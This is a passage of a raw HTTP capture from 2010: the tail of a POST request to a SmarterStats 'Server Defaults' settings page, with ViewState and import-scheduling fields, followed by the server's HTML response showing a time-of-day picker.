HMjowMCBQTWQCHg9kFgJmDxYCHxwFBzI6MTUgUE1kAh8PZBYCZg8WAh8cBQcyOjMwIFBNZAIgD2QWAmYPFgIfHAUHMjo0NSBQTWQCIQ9kFgJmDxYCHxwFBzM6MDAgUE1kAiIPZBYCZg8WAh8cBQczOjE1IFBNZAIjD2QWAmYPFgIfHAUHMzozMCBQTWQCJA9kFgJmDxYCHxwFBzM6NDUgUE1kAiUPZBYCZg8WAh8cBQc0OjAwIFBNZAImD2QWAmYPFgIfHAUHNDoxNSBQTWQCJw9kFgJmDxYCHxwFBzQ6MzAgUE1kAigPZBYCZg8WAh8cBQc0OjQ1IFBNZAIpD2QWAmYPFgIfHAUHNTowMCBQTWQCKg9kFgJmDxYCHxwFBzU6MTUgUE1kAisPZBYCZg8WAh8cBQc1OjMwIFBNZAIsD2QWAmYPFgIfHAUHNTo0NSBQTWQCLQ9kFgJmDxYCHxwFBzY6MDAgUE1kAi4PZBYCZg8WAh8cBQc2OjE1IFBNZAIvD2QWAmYPFgIfHAUHNjozMCBQTWQCMA9kFgJmDxYCHxwFBzY6NDUgUE1kAgEPZBYCAgEPZBYCAgIPDxYCHwQFATFkZAICD2QWAgIBD2QWAmYPEGQQFQMESWRsZQxCZWxvdyBOb3JtYWwGTm9ybWFsFQMEaWRsZQtiZWxvd25vcm1hbAZub3JtYWwUKwMDZ2dnZGQCAw9kFgICAQ9kFgICAg8PFgIfBAUCMTVkZAIED2QWAgIBD2QWAgICDw8WAh8EBQIxNWRkAgUPZBYCAgEPZBYCAgIPDxYCHwQFAzUwMGRkAgYPZBYCAgEPZBYCAgIPDxYCHwQFATFkZAIHD2QWAgIBD2QWAgICDw8WAh8EBQIxMGRkAggPZBYCAgEPZBYCZg8QZBAVChwwIC0gTm8gQ29tcHJlc3Npb24gKGZhc3Rlc3QpATEBMgEzATQLNSAoRGVmYXVsdCkBNgE3ATghOSAtIE1heGltdW0gQ29tcHJlc3Npb24gKHNsb3dlc3QpFQoBMAExATIBMwE0ATUBNgE3ATgBORQrAwpnZ2dnZ2dnZ2dnZGQCCQ9kFgICAQ9kFgICAg8PFgIfBAUGMTAwMDAwZGQCCg9kFgICAQ9kFgICAg8PFgIfBAUCMTVkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBAU%2fY3RsMDAkTVBIJEltcG9ydGluZ1NlcnZlckZpZWxkczEkdGZEYXRlUmFuZ2VQaWNrZXJfU2V0dGluZ1RleHQxBUhjdGwwMCRNUEgkSW1wb3J0aW5nU2VydmVyRmllbGRzMSR0ZkRhdGVSYW5nZVBpY2tlcl9TZXR0aW5nVGV4dDEkdGltZVZpZXcFP2N0bDAwJE1QSCRJbXBvcnRpbmdTZXJ2ZXJGaWVsZHMxJHRmRGF0ZVJhbmdlUGlja2VyX1NldHRpbmdUZXh0MgVIY3RsMDAkTVBIJEltcG9ydGluZ1NlcnZlckZpZWxkczEkdGZEYXRlUmFuZ2VQaWNrZXJfU2V0dGluZ1RleHQyJHRpbWVWaWV3%2bkz42QYd6w4ZGSKnPcwS444pPMAD3fZO6W7GukaAKLs%3d&ctl00%24MPH%24ImportingServerFields1%24txtRowsBeforeSleep_SettingText=500&ctl00%24MPH%24ImportingServerFields1%24txtIdleTimeBetweenLoops_SettingText=15&ctl00%24MPH%24ImportingServerFields1%24txtReaderTimeSlice_SettingText=15&ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_timeView_ClientState=

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 05:22:38 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 05:22:38 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 38931
Connection: Close



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Server Defaults - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmServerDefaults.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTIwMTEzMzc4OTMPFgQeEF9fX1Jlc3VsdEZhaWx1cmVlHhBfX19SZXN1bHRTdWNjZXNzZRYCZg9kFgICAQ9kFgoCBA8WBB4Fc3R5bGUFDWRpc3BsYXk6bm9uZTseB1Zpc2libGVoZAIGDxYCHwNoZAIHD2QWAmYPZBYCAgEPFgIfA2gWAgIBDxYCHgRUZXh0ZWQCCA8WAh8DaGQCCQ9kFgICAQ9kFgJmD2QWAgIBD2QWAmYPZBYWZg9kFgICAQ9kFgQCAQ8PFhAeE0VuYWJsZUVtYmVkZGVkU2tpbnNoHgRTa2luBQxTbWFydGVyVG9vbHMeB01heERhdGUGAADbmXo/MQkeBF8hU0ICAh4cRW5hYmxlRW1iZWRkZWRCYXNlU3R5bGVzaGVldGgeCENzc0NsYXNzBRJUaW1lUGlja2VyT3ZlcnJpZGUeB01pbkRhdGUGAEBXIFMFUQgeDFNlbGVjdGVkRGF0ZQYAADaMtzfNCGQWCmYPFCsACA8WFh8FaB4NT3JpZ2luYWxWYWx1ZQUIMTI6MDAgQU0eCkRhdGVGb3JtYXQFAXQeEURpc3BsYXlEYXRlRm9ybWF0BQF0HwcGAADbmXo/MQkeDUxhYmVsQ3NzQ2xhc3MFB3JpTGFiZWweF0VuYWJsZUFqYXhTa2luUmVuZGVyaW5naB8GBQxTbWFydGVyVG9vbHMfCWgfCwYAQFcgUwVRCB8EBRMyMDEwLTEwLTEyLTAwLTAwLTAwZBYGHgVXaWR0aBsAAAAAAABZQAcAAAAfCgURcmlUZXh0Qm94IHJpSG92ZXIfCAKCAhYGHxIbAAAAAAAAWUAHAAAAHwoFEXJpVGV4dEJveCByaUVycm9yHwgCggIWBh8SGwAAAAAAAFlABwAAAB8KBRNyaVRleHRCb3ggcmlGb2N1c2VkHwgCggIWBh8SGwAAAAAAAFlABwAAAB8KBRNyaVRleHRCb3ggcmlFbmFibGVkHwgCggIWBh8SGwAAAAAAAFlABwAAAB8KBRRyaVRleHRCb3ggcmlEaXNhYmxlZB8IAoICFgYfEhsAAAAAAABZQAcAAAAfCgURcmlUZXh0Qm94IHJpRW1wdHkfCAKCAhYGHxIbAAAAAAAAWUAHAAAAHwoFEHJpVGV4dEJveCByaVJlYWQfCAKCAmQCAQ8PFgIfA2hkZAICDzwrAA0BAA8WCAUETWluRAYAQFcgUwVRCAUPUmVuZGVySW52aXNpYmxlZwURRW5hYmxlTXVsdGlTZWxlY3RoBQRNYXhEBgAA25l6PzEJDxYIHwloHwVoHwYFDFNtYXJ0ZXJUb29scx8DaGRkAgMPDxYEHghJbWFnZVVybAUtL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvVXBjb21pbmcuZ2lmHg1Ib3ZlckltYWdlVXJsBS0vQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9VcGNvbWluZy5naWYWAh4Hb25jbGljawVmcmV0dXJuIENhbGVuZGFyUG9wdXAoJGZpbmQoJ2N0bDAwX01QSF9JbXBvcnRpbmdTZXJ2ZXJGaWVsZHMxX3RmRGF0ZVJhbmdlUGlja2VyX1NldHRpbmdUZXh0MScpLCd0aW1lJyk7ZAIEDxQrAAIPFg4fCWgfBWgeCVN0YXJ0VGltZSgpXFN5c3RlbS5UaW1lU3BhbiwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5CDA3OjAwOjAwHgdFbmRUaW1lKCsECDE5OjAwOjAwHghJbnRlcnZhbCgrBAgwMDoxNTowMB8GBQxTbWFydGVyVG9vbHMfEWhkFgQfCgUHcmNIb3Zlch8IAgIWAmYPFCsACQ8WBh4NUmVwZWF0Q29sdW1ucwIEHghEYXRhS2V5cxYAHgtfIUl0ZW1Db3VudAIwZBYEHwplHwgCAmQWBB8KZR8IAgJkZBYEHwoFCHJjSGVhZGVyHwgCAhYEHwoFCHJjRm9vdGVyHwgCAhYGHxIbAAAAAABAb0ABAAAAHwoFSVJhZENhbGVuZGFyVGltZVZpZXcgUmFkQ2FsZW5kYXJUaW1lVmlld19TbWFydGVyVG9vbHMgUmFkQ2FsZW5kYXJUaW1lVmlldyAfCAKCAhZgAgEPZBYCZg8WAh4JaW5uZXJodG1sBQc3OjAwIEFNZAICD2QWAmYPFgIfHAUHNzoxNSBBTWQCAw9kFgJmDxYCHxwFBzc6MzAgQU1kAgQPZBYCZg8WAh8cBQc3OjQ1IEFNZAIFD2QWAmYPFgIfHAUHODowMCBBTWQCBg9kFgJmDxYCHxwF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AmYPFgIfHAUHMjowMCBQTWQCHg9kFgJmDxYCHxwFBzI6MTUgUE1kAh8PZBYCZg8WAh8cBQcyOjMwIFBNZAIgD2QWAmYPFgIfHAUHMjo0NSBQTWQCIQ9kFgJmDxYCHxwFBzM6MDAgUE1kAiIPZBYCZg8WAh8cBQczOjE1IFBNZAIjD2QWAmYPFgIfHAUHMzozMCBQTWQCJA9kFgJmDxYCHxwFBzM6NDUgUE1kAiUPZBYCZg8WAh8cBQc0OjAwIFBNZAImD2QWAmYPFgIfHAUHNDoxNSBQTWQCJw9kFgJmDxYCHxwFBzQ6MzAgUE1kAigPZBYCZg8WAh8cBQc0OjQ1IFBNZAIpD2QWAmYPFgIfHAUHNTowMCBQTWQCKg9kFgJmDxYCHxwFBzU6MTUgUE1kAisPZBYCZg8WAh8cBQc1OjMwIFBNZAIsD2QWAmYPFgIfHAUHNTo0NSBQTWQCLQ9kFgJmDxYCHxwFBzY6MDAgUE1kAi4PZBYCZg8WAh8cBQc2OjE1IFBNZAIvD2QWAmYPFgIfHAUHNjozMCBQTWQCMA9kFgJmDxYCHxwFBzY6NDUgUE1kAgEPZBYCAgEPZBYCAgIPDxYCHwQFATFkZAICD2QWAgIBD2QWAmYPEGQQFQMESWRsZQxCZWxvdyBOb3JtYWwGTm9ybWFsFQMEaWRsZQtiZWxvd25vcm1hbAZub3JtYWwUKwMDZ2dnZGQCAw9kFgICAQ9kFgICAg8PFgIfBAUCMTVkZAIED2QWAgIBD2QWAgICDw8WAh8EBQIxNWRkAgUPZBYCAgEPZBYCAgIPDxYCHwQFAzUwMGRkAgYPZBYCAgEPZBYCAgIPDxYCHwQFATFkZAIHD2QWAgIBD2QWAgICDw8WAh8EBQIxMGRkAggPZBYCAgEPZBYCZg8QZBAVChwwIC0gTm8gQ29tcHJlc3Npb24gKGZhc3Rlc3QpATEBMgEzATQLNSAoRGVmYXVsdCkBNgE3ATghOSAtIE1heGltdW0gQ29tcHJlc3Npb24gKHNsb3dlc3QpFQoBMAExATIBMwE0ATUBNgE3ATgBORQrAwpnZ2dnZ2dnZ2dnZGQCCQ9kFgICAQ9kFgICAg8PFgIfBAUGMTAwMDAwZGQCCg9kFgICAQ9kFgICAg8PFgIfBAUCMTVkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBAU/Y3RsMDAkTVBIJEltcG9ydGluZ1NlcnZlckZpZWxkczEkdGZEYXRlUmFuZ2VQaWNrZXJfU2V0dGluZ1RleHQxBUhjdGwwMCRNUEgkSW1wb3J0aW5nU2VydmVyRmllbGRzMSR0ZkRhdGVSYW5nZVBpY2tlcl9TZXR0aW5nVGV4dDEkdGltZVZpZXcFP2N0bDAwJE1QSCRJbXBvcnRpbmdTZXJ2ZXJGaWVsZHMxJHRmRGF0ZVJhbmdlUGlja2VyX1NldHRpbmdUZXh0MgVIY3RsMDAkTVBIJEltcG9ydGluZ1NlcnZlckZpZWxkczEkdGZEYXRlUmFuZ2VQaWNrZXJfU2V0dGluZ1RleHQyJHRpbWVWaWV3SBgWk0fal3NvyQRRGp5QWPcp5LT4rfJ+vrX3AsyIJHU=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=ViSwXssY2t4u-Qbx4w6bru0KSpyf_B0vCVudPBQgSL7pdZgJgsa-ZWozxrSKwrw9y9GZsHwVVOrd1WeIw5NPwP1jyRtmNpMtMhXJtQ7Ds3FNebDhERVTBNBcItEGfJ6GlPm0maqMQuQbXCRuE2OSeQ2&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=b_zxvPWW2bmUI7-yPqxdjxNcYGLbh-5zreoWPsyuSsM904jjxphVYn3M53uzsMEtA28xV93yhZNeO7aopeQCsRrqUrg4Mn087e0aShAFwwmtOSohzmSffW6uJ6_AtQVWulXcR71k6brUxjM0zkq5aQ2&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=rLkVatSveEIPrLuVrqd-Rqu9c-Qp5n3u_agt7bqrbK66Z1GODOCn_TqYoCtv79JakYjGy-hs5HVRebk_BZqNoTXEExvRXPbqgtEiHRkA8jwIrcayoDlnuZWpcWkdnNZ0Xh2nW6TTKEXMqhxGKpfZuDd_ibYZO_jwoRaEz-gTuis1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=6zWCA5MGnk1O7jGqil7oaEno5S4jl_Hy2DEff0O12hXFolePK_7MEsHMxjFhDttR_A1sp8_vV2jrHOPi8EittFZMWi7VxSljR3WBFJUkockb0KJAJkRxHMS__9x31NURQzO_xxVu2nGS7C-pmpy9V93ZzsHebZzQtk_CXCKrDD01&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=lLLtS4naJDImPTKNmUJQfLQTilsivnIQAur3V3HaSgMLcMP7PsA5f4kjlb3kqShr6tFI09EQ_LpVGgtASh0aod4IMqiQHdbjh826Cq366PNPBKuiiCQA5ig7s69T2XwokbUga0lO8RRhQZeBem4bT4JBVCPu7V0WghScW5VAv741&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=dim8nyrCK3sbBE3vfEjhnHLVQjoQa7K4EDVi51FwrwWZRYjEGIN1TgwIRvo7NIo5VbnkeJxu3LEwuEak1hX108zj9QGEZyRv54Qk_tiJNRVGHTif1EoYWVv49mnpinZUuNk-PXItaRDiww30xt64kKGWlIR8GsCqaB2e72wdFJ01&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=_lSjFkDxd3Gnr7ocFU6QUkZOrdHPnZsqNRClSK61AtN-ATLEiBiN0mgZ6qde0SYytY9Y7JPZGbAn0G1XxGzBJPMqZRiXEJK-nZxx5QIbzRoDB5Syl5oGPlUxKWDON3Z5Ld0hMHW-sKkMnHWb_hwzCyUGXoXIUKoCDwj5C88getY1&amp;t=ffffffff92e2d680" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=JOd_zE-rVnhst9gjbTnWxhkLnomfRJOvAba74jYUNOYndrLTcDyBPLUH4sKs48Lj5n5-lBATFKj-hFHq_rS8K95dEYHJCXJBFm6TbI7MrJu3R7ZD9vx_k8jaeCbKbroCzLu5qdhlqN8jh5PII2qVOLUrmc7F1nKNJN5I5VXGXQI1&amp;t=ffffffff92e2d680" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1','','tctl00$MPH$UpdatePanel2',''], [], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       Server Defaults
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
   <div id="ctl00_BPH_btnSave" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnSave',''); return false;"><span class="BBInner">Save</span></a></div>

           </div>
           <div class="ButtonBarRight">
               
           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   <div id="ctl00_MPH_UpdatePanel2">
   
           <table id="ctl00_MPH_ImportingServerFields1_Table1" class="SettingsContainer SCMarginTop" border="0">
       <tr id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker">
           <td id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_Label" class="Indent Fixed">Import Time of Day</td><td id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_Setting" class="Setting"><table class='table'><tr><td><div id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_wrapper" class="RadPicker RadPicker_SmarterTools TimePickerOverride" style="display:inline;zoom:1;width:110px;">
               <!-- 2010.2.817.40 --><input style="visibility:hidden;display:block;float:right;margin:0 0 -1px -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1" name="ctl00$MPH$ImportingServerFields1$tfDateRangePicker_SettingText1" type="text" class="rdfd_" value="2010-10-12-00-00-00" /><table cellspacing="0" class="rcTable" style="width:100%;">
                   <tr>
                       <td class="rcInputCell" style="width:100%;"><span id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_dateInput_wrapper" class="RadInput RadInput_SmarterTools" style="display:block;"><input type="text" value="12:00 AM" id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_dateInput_text" name="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_dateInput_text" class="riTextBox riEnabled" style="width:100%;" /><input style="visibility:hidden;float:right;margin:-18px 0 0 -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_dateInput" name="ctl00$MPH$ImportingServerFields1$tfDateRangePicker_SettingText1$dateInput" type="text" class="rdfd_" value="2010-10-12-00-00-00" /><input id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_dateInput_ClientState" name="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_dateInput_ClientState" type="hidden" /></span></td><td><a title="Open the time view popup." href="#" id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_timePopupLink" onclick="return CalendarPopup($find(&#39;ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1&#39;),&#39;time&#39;);"><img id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_TimePopupButton" src="/App_Themes/Default/Images/16x16/Upcoming.gif" alt="Open the time view popup." style="border-width:0px;" /></a><div id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_timeView_wrapper" style="display:none;width:250px;overflow-x:auto;" ><div id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_timeView">
                           <table id="ctl00_MPH_ImportingServerFields1_tfDateRangePicker_SettingText1_timeView_tdl" class="RadCalendarTimeView RadCalendarTimeView_SmarterTools RadCalendarTimeView " cellspacing="0" border="0" style="width:250px;">
                               <tr>
                                   <th colspan="4" scope="col" class="rcHeader">Time Picker</th>
                               </tr><tr>
                                   <td><a href="#">7:00 AM</a></td><td><a href="#">7:15 AM</a></td><td><a href="#">7:30 AM</a></td><td><a href="#">7:45 AM</a></td>
                               </tr><tr>
                                   <td><a href="#">8:00 AM</a></td><td><a href="#">8:15 AM</a></td><td><a href="#">8:30 AM</a></td><td><a href="#">8:45 AM</a></td>
                               </tr><tr>
                                   <td><a href="#">9:00 AM</a></td><td><a href="#">9:15 AM</a></td><td><a href="#">9:30 AM</a></td><td><a href="#">9:45 AM</a></td>
                               </tr><tr>
